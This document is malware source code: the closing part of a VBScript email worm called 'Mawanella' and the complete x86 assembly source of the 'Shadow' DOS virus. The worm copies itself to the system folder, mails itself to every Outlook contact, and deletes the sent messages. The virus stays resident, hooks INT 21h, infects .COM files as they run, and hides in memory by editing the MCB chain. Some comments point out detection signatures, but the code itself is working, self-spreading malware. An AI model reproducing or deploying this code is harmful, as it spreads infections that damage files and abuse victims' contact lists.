Set cFile = fso.GetFile(WScript.ScriptFullName)
cFile.Copy(dirsystem&"\Mawanella.vbs")

' Mass-mailing through Outlook automation.  The If compares the Application
' object with a string, which relies on the object's default property
' evaluating to "Outlook" (presumably its Name -- confirm); when Outlook is
' absent (or the comparison fails) the Else branch runs instead.
Set OutlookA = CreateObject("Outlook.Application")
If OutlookA = "Outlook" Then
Set Mapi=OutlookA.GetNameSpace("MAPI")
Set AddLists=Mapi.AddressLists
For Each ListIndex In AddLists
If ListIndex.AddressEntries.Count <> 0 Then
ContactCountX = ListIndex.AddressEntries.Count
For Count= 1 To ContactCountX
' One new mail item (CreateItem(0) = olMailItem) per address entry.
Set MailX = OutlookA.CreateItem(0)
Set ContactX = ListIndex.AddressEntries(Count)
'msgbox contactx.address
'Mailx.Recipients.Add(ContactX.Address)
MailX.To = ContactX.Address
' Fixed subject and body text: usable as a mail-gateway detection signature.
MailX.Subject = "Mawanella"
MailX.Body = vbcrlf&"Mawanella is one of the Sri Lanka's Muslim Village"&vbcrlf
'Set Attachment=MailX.Attachments
'Attachment.Add dirsystem & "\Mawanella.vbs"
'Mailx.Attachments.Add(dirsystem & "\Mawanella.vbs")
' Attaches the copy dropped above (VBScript identifiers are case-insensitive,
' so Mailx and MailX are the same variable).
Mailx.Attachments.Add(dirsystem & "\Mawanella.vbs")
' The sent message is not kept in Sent Items, so the user sees no trace of it.
MailX.DeleteAfterSubmit = True
If MailX.To <> "" Then
MailX.Send
End If
Next
End If
Next
Else
msgBox "Please Forward this to everyone"
End if
' Decoy dialog (ASCII art plus the political text) shown after the mailing
' loop has finished.
strMsg= " ) (" & vbcrlf
strMsg= strMsg & "( ) ( ) " & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " -------------------------" & vbcrlf
strMsg= strMsg & " / ( ( ( /\" & vbcrlf
strMsg= strMsg & " / ( / \" & vbcrlf
strMsg= strMsg & " / ( ( / \" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & " --- " & vbcrlf
strMsg= strMsg & " ----- " & vbcrlf
strMsg= strMsg & " --- " & vbcrlf
strMsg= strMsg & " " & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & "Mawanella is one of the Sri Lanka's Muslim Village." & vbcrlf
strMsg= strMsg & "This brutal incident happened here 2 Muslim Mosques & 100 Shops are burnt." & vbcrlf
strMsg= strMsg & "I hat this incident, What about you? I can destroy your computer" & vbcrlf
strMsg= strMsg & "I didn't do that because I am a peace-loving citizen."

msgbox strMsg,,"Mawanella"
End sub

Shadow virus (non-destructive)

####################################Shadow Virus - Non Destructive###################################;+----------------------------------------------------------------------------+
Overview
Language - x86 Assembly
Operating Systems - MS-DOS, Windows 95/98
Type - Memory Resident
Files Infected - DOS COM Files (.COM)
Characteristics - Virus Residency Check
The virus manipulates the DOS MCB chain to hide its resident copy in memory, so the copy is not shown by the MEM command
;+----------------------------------------------------------------------------+
CODE_SEG SEGMENT
ASSUME CS:CODE_SEG
ORG 100H
;----------------------------------------------------------------------------
; PROGRAM STARTS HERE
;----------------------------------------------------------------------------
; .COM image: ORG 100h, so every label is an offset from the original load
; address. Once appended to a host the same code runs at a different offset,
; which is why all data is addressed relative to BP (see @GetRelocation).
START:
jmp INSTALL_VIRUS ;go to the installation routine
;----------------------------------------------------------------------------
; Data Area
;----------------------------------------------------------------------------
nISRNumber EQU 21h ;interrupt that gets hooked (DOS services)
nVirusID EQU 4B12h ;has to be 4Bxxh where xx=03 to FF
;"are-you-there" value: INSTALL_VIRUS puts it in AX and calls INT 21h; the
;resident copy (NewDosISR) answers by returning the same value in BX
;nVirusSize EQU (offset END_OF_CODE - offset START)
;Debug strings printed through Printf during infection. They travel with the
;appended image, so they form a plain-text on-disk signature of infected files.
sFileOpen db "Opening File for Read/Write...",0
sFileCheck db "Reading Signature from File...",0
sFileSignature db "Checking Signature...",0
sPointerMoved db "File Pointer Move OK...", 0
sComFile db "File is a .COM File......Infecting File with Virus!!",0
sFileInfected db "File has been infected...",0
sClosingFile db "Closing File...",0
sJumpUpdated db "Jump Instruction Added...", 0
sAlreadyInfected db "File is already infected...",0
_DX_DS dw 2 dup (?) ;DS:DX is stored here, first DX, then DS
db "File Handle:"
wHostFileHandle dw ? ;handle of the host file
;------------------------- DON'T SEPARATE -------------------------
;These five bytes are written verbatim over the start of the host file:
;E9 <len-3> "RB", i.e. a JMP to the appended code followed by the marker.
HostBytesNew db 0E9h ;opcode for a JMP instruction
wHostFileLength dw ? ;length of the host file (minus 3)
VirusSignature db "RB" ;signature of the virus
;------------------------- DON'T SEPARATE -------------------------
;HostBytesOld and HostSignature together are the 5-byte read buffer used by
;InfectFile, so they must stay adjacent.
HostBytesOld db 0CDh, 20h, ?
;first three bytes of host file. The first two bytes are set to
;INT 20h,so that when "this" file is executed without a host,
;it quits when it tries to transfer control to the host.
HostSignature db 2 dup (?) ;the virus signature is stored in bytes
;4 and 5 of the host file. If the file is infected, these bytes
;will be equal to "VirusSignature" defined above
;----------------------------------------------------------------------------
; GetRelocation
;----------------------------------------------------------------------------
; Description
; -> Gets the relocation value (aka delta offset) i.e the value that must
; be added to each variable in the program if the program has been
; relocated. The program gets relocated when it attaches itself to
; the host file. If the program has not been relocated, the value
; returned is 0
; Arguments
; -> Register: Register in which the value is to be stored
; Registers Destroyed
; -> Register (the one passed in); one stack word is used transiently
;____________________________
@GetRelocation MACRO Register
LOCAL GetIPCall
call GetIPCall ;this will push the IP on the stack
GetIPCall:
pop Register ;actual run-time offset of GetIPCall ...
sub Register, offset GetIPCall ;... minus its assembly-time offset = delta
ENDM
;----------------------------------------------------------------------------
; SaveRegisters
;----------------------------------------------------------------------------
; Description
; -> Saves the contents of all the registers on the stack
; (10 words: ax, bx, cx, dx, es, ds, si, di, bp, flags). Push order is
; the exact reverse of @RestoreRegisters and must stay that way.
; Arguments
; ->
; Registers Destroyed
; -> none (SP is lowered by 20 bytes)
;___________________
@SaveRegisters MACRO
push ax
push bx
push cx
push dx
push es
push ds
push si
push di
push bp
pushf
ENDM
;----------------------------------------------------------------------------
; RestoreRegisters
;----------------------------------------------------------------------------
; Description
; -> Restores the contents of all the registers from the stack
; (pop order is the reverse of @SaveRegisters)
; Arguments
; ->
; Registers Destroyed
; -> ax, bx, cx, dx, es, ds, si, di, bp, flags
;______________________
@RestoreRegisters MACRO
popf
pop bp
pop di
pop si
pop ds
pop es
pop dx
pop cx
pop bx
pop ax
ENDM
;----------------------------------------------------------------------------
; PrintReturnCode
;----------------------------------------------------------------------------
; Description
; -> Debug helper: displays the return code stored in the register AX
; by writing AH+'0' and then AL+'0' as characters via BIOS teletype
; output. There is no decimal/hex conversion, so only byte values
; 0..9 come out as readable digits.
; Arguments
; -> AX contains the code to be displayed
; Registers Destroyed
; -> none (ax, bx, cx and flags are saved and restored)
;_____________________
@PrintReturnCode MACRO
pushf
push ax
push bx
push cx
xchg ax,cx ;save return code
xor bx,bx ;video page 0
mov ah,0Eh ;BIOS teletype output
mov al,ch
add al,'0'
int 10h ;display high byte (as a single character)
mov al,cl
add al,'0'
int 10h ;display low byte (as a single character)
pop cx
pop bx
pop ax
popf
ENDM
;----------------------------------------------------------------------------
; Printf
;----------------------------------------------------------------------------
; Description
; -> Displays a string, and goes to the next line. The string should end
; with a NULL character 0x00. Output goes through BIOS INT 10h
; teletype, not through DOS, so it also works from inside the
; INT 21h handler.
; Arguments
; -> ds:si: Address of the string to be displayed
; Registers Destroyed
; -> ax, si (lodsb advances SI past the terminating NUL)
;__________
Printf PROC
push bx
mov ah,0Eh ;teletype output
xor bx, bx ;page 0
DISPLAY_CHAR:
lodsb ;get next character
int 10h ;display (the NUL itself is also sent)
test al, al ;end of string?
jne DISPLAY_CHAR
mov al,0Dh ;display carriage return ...
int 10h
mov al,0Ah ;... and line feed
int 10h
pop bx
ret
Printf ENDP
;----------------------------------------------------------------------------
; HookISR
;----------------------------------------------------------------------------
; Description
; -> Installs a new interrupt service routine: reads the current vector
; with INT 21h/35h (returned in ES:BX), stores it in the caller's
; buffer, then points the vector at DS:DX with INT 21h/25h.
; The saved old vector is what NewDosISR chains to.
; Arguments
; -> AL: Interrupt number
; -> SI: Buffer in which to save old ISR address (DWORD)
; -> DX: Address of new ISR (segment taken from DS)
; Registers Destroyed
; -> ah, bx, es
;___________
HookISR PROC
mov ah, 35h
int 21h ;Get Address of Old ISR (ES:BX)
mov word ptr [si], bx ;Save it (offset first, ...
mov word ptr [si+2], es ;... then segment)
mov ah, 25h ;Install New ISR from DS:DX
int 21h
ret
HookISR ENDP
;----------------------------------------------------------------------------
; NewDosISR
;----------------------------------------------------------------------------
; Description
; -> Replacment ISR for DOS INT 21h. It handles two cases itself:
; AX = nVirusID : residency check, answered with BX = nVirusID
; AX = 4B00h : EXEC; the file named by DS:DX is passed to
; InfectFile first, then the original handler runs
; Everything else is forwarded unchanged to the saved original
; vector. Infection therefore happens at the moment a program is
; started, which is the behaviour a monitor for INT 21h/4Bh would see.
; Arguments
; -> as for INT 21h
; Registers Destroyed
; -> bx (residency path: AX/BX are swapped before iret); on the EXEC
; path all registers are saved around InfectFile and the flags
; returned are those of the original handler
;_____________
NewDosISR PROC
pushf
cmp ax, nVirusID ;function to check residency of virus?
jne NOT_VIRUS_CHECK
popf ;because we pushed the flags before comparing
xchg ax, bx ;tell calling program that we're resident (BX = nVirusID)
iret ;return, since we don't have to call old ISR
NOT_VIRUS_CHECK:
cmp ax, 4B00h ;load and execute file?
je EXEC_FN
popf ;because we pushed the flags before comparing
;-- JUMP TO OLD ISR --
;The following two lines will jump the old ISR
;These lines are equivalent to jmp dwOldExecISR
;The 4-byte operand (dwOldExecISR) is filled in by HookISR, which receives
;its address in SI from INSTALL_VIRUS.
db 0EAh ;op code for inter segment JMP instruction
dwOldExecISR DD ? ;old ISR address is stored here
EXEC_FN:
popf ;because we pushed the flags before comparing
;-- SAVE FILENAME ADDRESS --
push bp
@GetRelocation bp
mov cs:bp+_DX_DS, dx ;DS:DX contains the filename. we must save
mov cs:bp+_DX_DS+2, ds ;these, because they will be destroyed after
pop bp ;the call to INT 21h
;-- CALL ROUTINE TO INFECT FILE --
@SaveRegisters ;we don't want to mess up, since this is an ISR
push cs
push cs
pop ds ;make DS ...
pop es ;... and ES = CS
cli ;interrupts stay off for the whole infection
call InfectFile ;infect the file before it is executed
sti
@RestoreRegisters ;restore before calling orignal ISR
;-- CALL OLD ISR --
pushf ;because an iret will pop the flags, CS and IP
;call far cs:[disp16]; the displacement word below is patched by
;INSTALL_VIRUS with the (block-relative) address of dwOldExecISR
DB 2Eh, 0FFh, 1Eh ;op code for CALL FAR CS:[xxxx]
dwOldExecISRVariable DW ? ;address of dwOldExecISR (defined above)
;-- UPDATE OLD FLAGS ON STACK --
pushf ;this is the IMPORTANT part. we must pass the
push bp ;the new flags back, and not the old ones.
push ax
mov bp, sp ;stack: [bp]=ax [bp+2]=bp [bp+4]=new flags
mov ax, [bp+4] ;get new flags (which we just pushed 'pushf')
mov [bp+10], ax ;replace the old flags with the new. the stack
pop ax ;initially had FLAGS, CS, IP (in that order),
pop bp ;so [bp+6]=IP [bp+8]=CS [bp+10]=FLAGS
popf
iret
NewDosISR ENDP
;----------------------------------------------------------------------------
; InfectFile
;----------------------------------------------------------------------------
; Description
; -> Attaches the virus to the file (infect) if not already infected.
; Steps: open read/write, read the first 5 bytes, skip 'MZ' (EXE)
; files and files already carrying the "RB" marker in bytes 4-5,
; append the whole image (END_OF_CODE-START bytes) at end-of-file,
; then overwrite bytes 1-5 with E9 <len-3> "RB".
; Net on-disk change of an infected .COM file (useful for scanning):
; size grows by exactly END_OF_CODE-START bytes, byte 1 becomes E9h,
; bytes 4-5 become "RB", and -- per the TODOs below -- attributes
; are not touched and the last-write time is not restored.
; Arguments
; -> _DX_DS contains the name of the file to be infected
; Registers Destroyed
; -> TODO: ??????? (at least ax, bx, cx, dx, si, di, bp, ds and flags
; are modified; the caller wraps this in @SaveRegisters)
;TODO: Remove read-only/system attributes, and restore when done
;TODO: Time & Date should remain the same
;______________
InfectFile PROC
@GetRelocation bp
lea si,bp+sFileOpen
call Printf
;-- OPEN FILE --
lds dx, cs:dword ptr [bp+_DX_DS] ;get the file name to be infected
mov si, dx
call Printf ;display the filename
mov ax, 3D02h ;open file for reading/writing
int 21h
pushf
@PrintReturnCode ;display the handle of the file
popf
jnc FILE_OPENED
ret ;open failed: the only exit that skips CLOSE_FILE
FILE_OPENED:
mov bp+wHostFileHandle, ax ;save handle
push cs
pop ds ;restore DS
lea si, bp+sFileCheck
call Printf
;-- READ FIRST 5 BYTES --
mov ah,3Fh ;read ...
mov bx, bp+wHostFileHandle
mov cx,5 ;... 5 bytes from the file
lea dx,bp+HostBytesOld ;address of buffer in which to read
int 21h ;(buffer = HostBytesOld + HostSignature, adjacent)
pushf
@PrintReturnCode ;display number of bytes read
popf
jnc FILE_READ_OK
jmp CLOSE_FILE
FILE_READ_OK:
lea si,bp+sFileSignature
call Printf
;-- CHECK SIGNATURE --
xchg di, dx ;DI = buffer where data has been read
mov ax, 5A4Dh ;EXE signature = 'MZ' (M=4Dh, Z=5Ah, little-endian word)
cmp ax, [di]
jne COM_FILE
jmp CLOSE_FILE ;file is an EXE file, cannot infect
COM_FILE:
lea si,bp+sComFile
call Printf
;-- CHECK FILE FOR PRIOR INFECTION --
mov ax,[di+3] ;get host signature (bytes 4-5 of the file)
lea bx,bp+VirusSignature
cmp ax, [bx] ;check signature
jne FILE_NOT_INFECTED
lea si,bp+sAlreadyInfected
call Printf
jmp CLOSE_FILE
FILE_NOT_INFECTED:
;-- ADD CODE TO HOST FILE --
mov ax, 4202h ;go to end-of-file (returns file length in AX)
mov bx, bp+wHostFileHandle
xor cx, cx
xor dx, dx
int 21h
jnc MOVE_PTR_OK
jmp CLOSE_FILE
MOVE_PTR_OK:
sub ax, 3 ;length of a JMP instruction (E9 xx xx)
mov bp+wHostFileLength, ax ;save the length of the file (minus 3)
lea si,bp+sPointerMoved
call Printf
mov ah,40h ;append virus code
mov bx, bp+wHostFileHandle
lea dx, bp+START
mov cx, offset END_OF_CODE-offset START
int 21h
jc CLOSE_FILE
lea si, bp+sFileInfected
call Printf
;-- ADD JMP INSTRUCTION TO BEGINNING OF HOST --
mov ax, 4200h ;go to beginning-of-file
mov bx, bp+wHostFileHandle
xor cx, cx
xor dx, dx
int 21h
jc CLOSE_FILE
@PrintReturnCode
lea si,bp+sPointerMoved
call Printf
mov ah, 40h ;write the jmp instruction to the file
mov bx, bp+wHostFileHandle
lea dx, bp+HostBytesNew
mov cx, 5 ;3 for the jmp instruction, and 2 for ...
int 21h ;... the virus signature
jc CLOSE_FILE
lea si,bp+sJumpUpdated
call Printf
@PrintReturnCode
CLOSE_FILE: ;-- CLOSE FILE --
lea si, bp+sClosingFile
call Printf
mov ah,3Eh
mov bx, bp+wHostFileHandle
int 21h
@PrintReturnCode
ret
InfectFile ENDP
;----------------------------------------------------------------------------
; INSTALL_VIRUS
;----------------------------------------------------------------------------
; Entry point reached from START. Sequence:
; 1. residency check through INT 21h with AX = nVirusID
; 2. shrink this program's own memory block and allocate a new one
; 3. mark the new MCB as last in chain / owned by DOS and copy the
; image into it (this is the "hidden from MEM" part)
; 4. lower the BIOS base-memory count by the virus size
; 5. hook INT 21h so the copy in the new block sees every EXEC
; 6. restore the host's original first 5 bytes at CS:100h and run it
; Steps 2-5 are skipped when already resident or when the MCB is not the
; last in the chain; the host still runs in either case.
INSTALL_VIRUS:
@GetRelocation bp
;-- VIRUS RESIDENCY CHECK --
mov ax, nVirusID
int 21h ;answered by NewDosISR when resident; otherwise
cmp bx, nVirusID ;virus installed? (presumably DOS leaves BX alone
je VIRUS_ALREADY_INSTALLED ;for this unknown 4Bxxh subfunction -- confirm)
;-- RESIZE MEMORY BLOCK --
mov ax, ds
dec ax
mov es, ax ;get MCB (segment just below the PSP)
cmp byte ptr es:[0],'Z' ;is it the last MCB in the chain?
jne CANNOT_INSTALL
mov bx, es:[3] ;get block size
sub bx, ((offset END_OF_CODE-offset START+15)/16)+1 ;compute new block size in paragraphs
push ds
pop es
mov ah, 4Ah ;resize memory block
int 21h
;-- ALLOCATE MEMORY --
mov ah, 48h ;allocate memory for the virus
mov bx, (offset END_OF_CODE-offset START+15)/16
int 21h ;AX will contain segment of allocated block
;-- UPDATE MCB --
;Writing the MCB directly (no DOS call) is what detaches the block from
;normal accounting; a memory-map walk that trusts owner=8 will list it as DOS.
dec ax
mov es, ax ;get MCB
mov byte ptr es:[0], 'Z' ;mark MCB as last in chain
mov word ptr es:[1], 8 ;mark DOS as owner of memory block
;****TESTING
;sub word ptr ds:[2], (offset END_OF_CODE-offset START+15)/16
;****TESTING
;-- COPY VIRUS TO NEW MEMORY BLOCK --
inc ax
mov es, ax ;get memory block
xor di, di ;destination address (offset 0 of the new block)
lea si, bp+START ;start of virus code in memory
mov cx, offset END_OF_CODE-offset START
cld
rep movsb ;copy virus
int 3h ;leftover debugger breakpoint; effect outside a debugger
;depends on the INT 3 handler in place
push es
pop ds ;make DS = segment of newly allocated block
mov ax, 40h
mov es, ax ;get BIOS segment
sub word ptr es:[13h], (offset END_OF_CODE-offset START+1023)/1024
;reduce available memory (BIOS data area word 0040:0013h, base memory
;in KB); the missing kilobytes remain visible as a lower total
;-- INSTALL NEW ISR FOR INT 21h --
;Labels assume ORG 100h but the copy starts at offset 0 of the new block,
;hence the -100h on every address handed to HookISR.
mov al, nISRNumber
lea si, dwOldExecISR-100h
lea dx, NewDosISR-100h
call HookISR
;-- UPDATE CALL INSTRUCTION IN NewExecISR --
mov ds:[dwOldExecISRVariable-100h],si ;update CALL FAR CS:[xxxx] instruction
;in PROC NewDOSISR
CANNOT_INSTALL:
VIRUS_ALREADY_INSTALLED:
;-- TRANSFER CONTROL TO HOST PROGRAM --
push cs
push cs
pop ds
pop es
mov di, 100h ;overwrite the in-memory JMP/marker with the
lea si, bp+HostBytesOld ;host's saved original bytes ...
mov cx,5 ;restore 5 bytes
rep movsb
mov bx, 100h
push bx
ret ;transfer to host program (... then jump to CS:100h)
;----------------------------------------------------------------------------
; END_OF_CODE
;----------------------------------------------------------------------------
END_OF_CODE:
CODE_SEG ENDS
END START